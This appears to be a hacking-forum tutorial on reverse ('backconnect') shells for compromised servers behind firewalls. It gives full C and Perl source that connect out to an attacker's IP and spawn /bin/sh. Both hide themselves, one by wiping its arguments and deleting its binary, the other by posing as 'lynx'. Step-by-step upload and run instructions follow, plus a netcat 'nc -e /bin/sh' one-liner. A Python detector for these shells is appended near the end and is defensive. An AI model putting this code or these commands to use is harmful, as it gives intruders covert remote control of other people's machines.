backConnect is usually used for a server that sits behind a proxy or firewall, so that a remote connection to it cannot be made. One trick is to reverse the connection, i.e. connect from the server out to the hacker's machine.
In more detail:
BindShell :
[SERVER - listening ] <=====[connect]====== [HACKER - remote connect]
If the situation looks like this:
[SERVER - listening ] [firewall] X <=====[refused]====== [HACKER - remote connect]
then use backconnect.
BackConnect :
[SERVER - backconnect] ======[connect]=====> [HACKER - listening]
OK. Clear? Or not? Let's get straight to it. There are two scripts.
1. backconnect.c
Code:
#include <stdio.h>
#include <stdlib.h>     /* atoi, exit, system */
#include <string.h>     /* strcat, strlen */
#include <strings.h>    /* bzero */
#include <unistd.h>     /* daemon, dup2, execl, close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_addr */
int main(int argc, char *argv[])
{
    int fd;
    struct sockaddr_in sin;
    char rms[21] = "rm -f ";
    /* detach from the terminal and keep running in the background */
    daemon(1, 0);
    /* address of the listener on the hacker's side: argv[1] = IP, argv[2] = port */
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    /* overwrite the arguments so IP and port no longer show up in the process list */
    bzero(argv[1], strlen(argv[1]) + 1 + strlen(argv[2]));
    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    /* connect out: the reverse of what a bind shell does */
    if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr))) < 0) {
        perror("[-] connect()");
        exit(0);
    }
    /* remove the binary itself from disk once the connection is up */
    strcat(rms, argv[0]);
    system(rms);
    /* point stdin, stdout and stderr at the socket, then replace the process with a shell */
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execl("/bin/sh", "sh -i", NULL);
    close(fd);
}
2. backconnect.pl
Code:
#!/usr/bin/perl
use Socket;
# process name that will be shown in ps/top instead of "perl backconnect.pl"
$cmd= "lynx";
# commands run once the socket is attached: kernel and user info, then a shell
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
# resolve the listener's address and connect out over TCP
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
# attach the three standard streams to the socket (same trick as dup2() in the C version)
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Seeppp.. Just pick whichever you like and whichever suits the conditions of the shell. If Perl is available, backconnect.pl is the recommended one.
How to use it:
1. Set up a listening port on your local machine, using netcat.
nc -vlp [port]
e.g.: nc -vlp 3536
2. Backconnect from the shell
Obviously, first upload bindshell.c or bindshell.pl (the backconnect.c / backconnect.pl above) to your shell, whether via wget, direct upload, creating the file, etc. What matters is that the file ends up on the shell.
#using bindshell.c
gcc -o bindshell bindshell.c
chmod 777 bindshell
./bindshell [your.ip.address] [port]
e.g.: ./bindshell 202.212.222.223 3536
Wait for it to connect. Once connected, do whatever you want.
#using bindshell.pl
perl bindshell.pl [your.ip.address] [port]
e.g.: perl bindshell.pl 202.212.222.223 3536
Wait for it to connect. Once connected, it's up to you. Disconnecting again is fine too.
OK. OK. Really easy, right?
The common way to backconnect is with netcat.
nc -vv 202.212.222.223 3536 -e /bin/sh
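From the defender's side, what both scripts above (and the netcat one-liner) have in common is that the resulting shell ends up with file descriptors 0, 1 and 2 all pointing at the same socket: dup2() in the C version, open(">&SOCKET") in the Perl one. The Python script below is an added example, not part of this post; it looks for exactly that fingerprint in /proc and is run here against a constructed sample snapshot. The pid numbers, process names and socket inodes in the sample are made up.

```python
import os
import re
from typing import Dict, List, Tuple

# Target of a /proc/<pid>/fd/<n> symlink when fd n is a socket, e.g. "socket:[12345]".
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")


def socket_inode(target: str):
    """Return the socket inode from a /proc fd symlink target, or None if it is not a socket."""
    m = SOCKET_LINK.match(target)
    return int(m.group(1)) if m else None


def is_suspect(fds: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all point at the *same* socket: the dup2()/open(">&SOCKET") fingerprint.
    Services started by inetd-style supervisors look identical, so treat hits as leads, not verdicts."""
    inodes = {socket_inode(fds.get(n, "")) for n in (0, 1, 2)}
    return len(inodes) == 1 and None not in inodes


def scan_snapshot(snapshot: Dict[int, dict]) -> List[Tuple[int, str]]:
    """snapshot maps pid -> {"comm": name, "fds": {0: target, 1: target, 2: target}}."""
    return sorted((pid, info["comm"]) for pid, info in snapshot.items() if is_suspect(info["fds"]))


def read_proc_snapshot(proc: str = "/proc") -> Dict[int, dict]:
    """Build the same structure from a live Linux /proc (root is needed to read other users' fds)."""
    snap = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            with open(f"{proc}/{name}/comm") as f:
                comm = f.read().strip()
            fds = {n: os.readlink(f"{proc}/{name}/fd/{n}") for n in (0, 1, 2)}
        except OSError:
            continue  # process exited or permission denied
        snap[int(name)] = {"comm": comm, "fds": fds}
    return snap


# Constructed sample, not captured data: 4242 mimics the dup2()'d sh of backconnect.c,
# 4243 the Perl variant (which renames itself, so the process name alone would not give it away).
SAMPLE = {
    1001: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    2002: {"comm": "nginx", "fds": {0: "/dev/null", 1: "socket:[555]", 2: "socket:[555]"}},
    4242: {"comm": "sh", "fds": {0: "socket:[9001]", 1: "socket:[9001]", 2: "socket:[9001]"}},
    4243: {"comm": "lynx", "fds": {0: "socket:[9002]", 1: "socket:[9002]", 2: "socket:[9002]"}},
}

if __name__ == "__main__":
    print("suspect processes in sample:", scan_snapshot(SAMPLE))  # [(4242, 'sh'), (4243, 'lynx')]
```

On a live box, `scan_snapshot(read_proc_snapshot())` gives the same list for real processes; cross-check each hit with the socket's peer address from `ss -tnp` before acting on it.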
Have fun trying it out.. :)